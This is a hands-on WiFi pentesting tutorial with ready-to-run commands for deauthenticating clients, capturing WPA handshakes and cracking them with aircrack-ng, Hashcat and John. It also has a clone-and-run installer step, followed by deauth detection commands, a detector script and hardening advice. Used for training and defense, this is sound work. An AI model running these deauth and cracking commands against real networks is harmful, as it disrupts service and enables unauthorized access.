Practical, hands-on WiFi pentesting guide for students and security professionals. Follow these steps only on networks you own or where you have explicit permission to test.
Table of contents
- What this guide covers
- Why WiFi security matters
- Quick start
- Hardware and system requirements
- Recommended adapters and where to buy
- Install drivers and helper scripts
- Basics and monitor mode
- Scanning and handshake capture
- Deauthentication and disruption techniques
- Freeze an AP with authentication floods
- Fake authentication frames
- Beacon flood — multiple fake access points
- Fake portal with airbase-ng
- Automate assessments with Airgeddon
- Evil twin attack
- Cracking handshakes — aircrack, Hashcat, John
- 2.4 GHz and 5 GHz scanning
- How to detect deauthentication attacks
- Security hardening and mitigation
- Legal and ethical rules
Practical, hands-on WiFi pentesting: recon, handshake capture, cracking, controlled disruption testing, and clear remediation steps. Designed for authorized security assessments and learning.
Quick highlights
- Map nearby networks and collect authorized WPA handshakes
- Run safe disruption tests in a lab to measure resilience
- Crack captures with wordlists or GPU tools and produce remediation
Legal and ethical note
Obtain written permission before any test. This guide is for defensive security and training only.
The TP-Link Archer T2U Plus uses a Realtek RTL8821AU chipset. It costs about ₹1,100 or maybe less, has good range, is well supported by the Linux community, and has drivers for Kali Linux, Parrot OS and others. The Archer T2U Plus is often on sale under 1000 INR, which is a very affordable price, and in my opinion it is a very good choice for beginners in pentesting.
If budget is not a concern, you can go for an Alfa WiFi adapter, which costs around 4-10k depending on sales and market prices. Alfa adapters have more range.
```bash
git clone https://github.com/Esther7171/WiFi-Pentesting && cd WiFi-Pentesting && chmod +x install.sh && ./install.sh
```
- This script automatically installs the drivers for external WiFi adapters on Kali.
The first thing to do is to identify your wireless adapter's interface name, which depends on your OS.
- In Kali the default name is wlan0. If you have two WiFi adapters connected at the same time, the second one shows up as wlan1.
You need an adapter that supports monitor mode and packet injection; if you are using the TP-Link T2U Plus, you are ready.

```bash
sudo su root          # become root
iwconfig              # list the wireless interfaces and their names
airmon-ng check kill  # stop processes (NetworkManager, wpa_supplicant) that interfere with monitor mode
```

- wlan0 => the interface name.
- WIFI@REALTEK => the nickname of wlan0; you can use either, but wlan0 is recommended.
- If you were already connected to WiFi, it may sometimes show wlan1 or wlan2 rather than wlan0 (for example when you have two adapters: one for your WiFi connection and a second one for testing).
```bash
ifconfig wlan0 down        # take the interface down before changing its mode
iwconfig wlan0 mode managed
ifconfig wlan0 up
iwconfig                   # confirm the interface and its current mode
airmon-ng start wlan0      # enable monitor mode (newer airmon-ng versions rename the interface to wlan0mon; use that name below if so)
airodump-ng wlan0          # list nearby networks
```
- Copy the BSSID of the network you want to test (the BSSID is the MAC address shown first in the airodump-ng output).
- Also note the CH value (the channel number of the same router).
- --bssid => the BSSID of the network you are testing
- --channel => the channel number (or use -c for the channel, but it sometimes does not work well)
- --write => create a file where the handshake is stored
```bash
# -w/--write takes a file prefix; airodump-ng appends a counter and extension (e.g. Meow-01.cap)
airodump-ng wlan0 --bssid <bssid> --channel <channel> --write /path/Meow
airodump-ng wlan0 --bssid <bssid> -c <channel> -w /path/Meow
airodump-ng wlan0 --bssid 3C:46:45:1D:5D:31 --channel 11 -w /home/death/Meow
```
- aireplay-ng is powerful; we use it to deauthenticate clients and capture the handshake when they try to reconnect.
- -a => router MAC address (BSSID).
- -c => the client connected to the router that we are going to deauthenticate.
- --deauth / -0 => the number of deauth packets to send.

```bash
aireplay-ng wlan0 -a <bssid> -c <station> --deauth 10
aireplay-ng wlan0 -a <bssid> -c <station> -0 <number of packets>
aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10
aireplay-ng wlan0 -a <bssid> -0 <number of packets>   # without -c: every client of the AP
```
The captured file (PCAP or .cap) contains the WPA/WPA2 EAPOL handshake or PMKID. Convert or use it directly depending on the cracking tool you choose.
Cracking with aircrack-ng (quick CPU wordlist test)
- Use aircrack-ng for fast CPU-based checks against wordlists:
```bash
aircrack-ng /path/Meow-01.cap -w /usr/share/wordlists/rockyou.txt
```
Cracking with Hashcat (GPU, recommended for large jobs)
- Convert captures into Hashcat format:
- Using hcxtools (recommended): extract 22000 format (PMKID + EAPOL)
```bash
hcxpcapngtool -o handshakes.22000 capture.pcapng
```
- Or use cap2hccapx (older) to create .hccapx:
```bash
cap2hccapx capture.cap handshakes.hccapx
```
- Run Hashcat (mode 22000 for modern captures):
```bash
hashcat -m 22000 handshakes.22000 /path/wordlists/rockyou.txt --status --status-timer=10
```
- Use masks, rules, and combinator attacks for better results. Example hybrid attack with a rule:
```bash
hashcat -m 22000 handshakes.22000 /path/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
```
Cracking with John the Ripper
- Convert the capture to John's wpapsk format with wpapcap2john (bundled with John jumbo) and run John:
```bash
wpapcap2john /path/Meow-01.cap > handshakes.john
john --wordlist=/usr/share/wordlists/rockyou.txt --format=wpapsk handshakes.john
```
Tips and best practices
- Prefer Hashcat with GPU for large wordlists and rule-based attacks.
- Use curated wordlists, rules, and masks before launching exhaustive attacks.
- Collect PMKID and EAPOL where possible; PMKID attacks avoid deauth in some cases.
- Always validate results and document timelines and commands in your report.
Legal reminder
Only attempt cracking on networks you own or where you have explicit written permission. Unauthorized cracking is illegal.
By default airodump-ng scans only 2.4 GHz networks. To scan 5 GHz and 2.4 GHz at the same time, use the --band switch and specify the band abg, which stands for 802.11a (5 GHz) plus 802.11b/g (2.4 GHz):
```bash
airodump-ng wlan0 --band abg
```
To disrupt a network we can use tools such as mdk4 and aireplay-ng. Use them only in authorized tests and with caution.
Using aireplay-ng
```bash
sudo aireplay-ng wlan0 -a router-bssid -c client-bssid -0 0
```
- -0 0 sends continuous deauthentication frames (a count of 0 means unlimited)
To target the whole router (disconnect every client)
```bash
sudo aireplay-ng wlan0 -a router-bssid -0 0
```
Install mdk4
```bash
sudo apt install mdk4
```
Common disruption modes (for awareness only)
- Deauthentication flood
- Fake authentication floods to overwhelm APs
- Beacon flood to create many fake SSIDs
- Evil twin and captive portal simulations in controlled lab environments
How to detect deauthentication attacks
Signs of a deauthentication attack
- Many clients disconnecting and reconnecting rapidly
- Repeated EAPOL handshakes captured in a short time window
- High volume of 802.11 management frames with subtype deauthentication
Quick commands to detect and log deauth frames
- Live capture with tshark (shows deauth frames)
```bash
# wlan0 must be in monitor mode to see management frames; 12 (0x0c) is the deauthentication subtype
tshark -i wlan0 -Y "wlan.fc.type_subtype == 12" -T fields -e frame.time -e wlan.sa -e wlan.da
```
- Save a capture and inspect it in Wireshark; use the display filter
```
wlan.fc.type_subtype == 0x0c
```
- Monitor station activity on the AP interface
```bash
watch -n 2 "iw dev wlan0 station dump"
```
What to check on your infrastructure
- AP/syslog entries for frequent disassociations or management frame reasons
- Client reports of intermittent connectivity on the same time window
- Presence of unknown MAC addresses repeatedly sending deauth frames
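To turn the tshark output above into an actual alert on "unknown MAC addresses repeatedly sending deauth frames", here is an added example script (not part of the original guide). It assumes tshark is run with `-e frame.time_epoch` in place of `-e frame.time` so that timestamps parse as plain seconds; the MAC addresses, sample lines, 2-second window and threshold of 20 frames are constructed values to tune per site.

```python
"""deauth_alert.py: flag deauthentication floods in tshark field output.

Added example, not from the original guide. Each input line must look like
"<frame.time_epoch>\t<wlan.sa>\t<wlan.da>", i.e. the guide's tshark command
run with -e frame.time_epoch instead of -e frame.time. The window, threshold,
MAC addresses and sample lines below are constructed values.
"""
import sys
from collections import defaultdict, deque

WINDOW_S = 2.0                   # assumed sliding window (seconds)
THRESHOLD = 20                   # assumed deauth frames per window that count as a flood
BROADCAST = "ff:ff:ff:ff:ff:ff"  # da == broadcast means every client of the AP is hit

# Constructed sample: 50 broadcast deauths in 2 s from one source, plus two sparse
# deauths from another source (normal AP housekeeping) that must not raise an alert.
SAMPLE = "\n".join(
    [f"{1700000000 + i * 0.04:.6f}\t02:11:22:33:44:55\tff:ff:ff:ff:ff:ff" for i in range(50)]
    + [f"{1700000005 + i * 4:.6f}\t02:aa:bb:cc:dd:ee\t02:99:88:77:66:55" for i in range(2)]
)

def parse_line(line):
    """Return (epoch, sa, da) for one tshark field line, or None if it is malformed."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 3 or not parts[1]:
        return None
    try:
        return float(parts[0]), parts[1].lower(), parts[2].lower()
    except ValueError:
        return None

def detect_floods(lines, window=WINDOW_S, threshold=THRESHOLD):
    """Map each source MAC that exceeds the threshold to (peak frames in window, saw broadcast)."""
    recent = defaultdict(deque)  # sa -> timestamps still inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        t, sa, da = rec
        q = recent[sa]
        q.append(t)
        while q and t - q[0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            peak, bcast = alerts.get(sa, (0, False))
            alerts[sa] = (max(peak, len(q)), bcast or da == BROADCAST)
    return alerts

if __name__ == "__main__":
    # Saved capture: tshark -r capture.pcapng -Y "wlan.fc.type_subtype == 12" -T fields \
    #   -e frame.time_epoch -e wlan.sa -e wlan.da | python3 deauth_alert.py
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE.splitlines()
    for sa, (peak, bcast) in detect_floods(source).items():
        print(f"ALERT: {peak} deauth frames within {WINDOW_S:g}s from {sa}"
              + (" targeting all clients (broadcast)" if bcast else ""))
```

Sources that appear in the alerts but are not your own APs' BSSIDs are the candidates to block at the controller; an AP's own address showing up with a broadcast destination is worth correlating with its syslog before treating it as hostile.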
Mitigations and quick responses
- Enable Protected Management Frames (802.11w / PMF) if supported
- Update access point firmware and enable vendor logging
- Move to a different channel and reboot affected APs as a short term fix
- Use IDS/monitoring to alert on high-rate management frames
- Document incidents, collect captures, and block offending MACs at the controller if available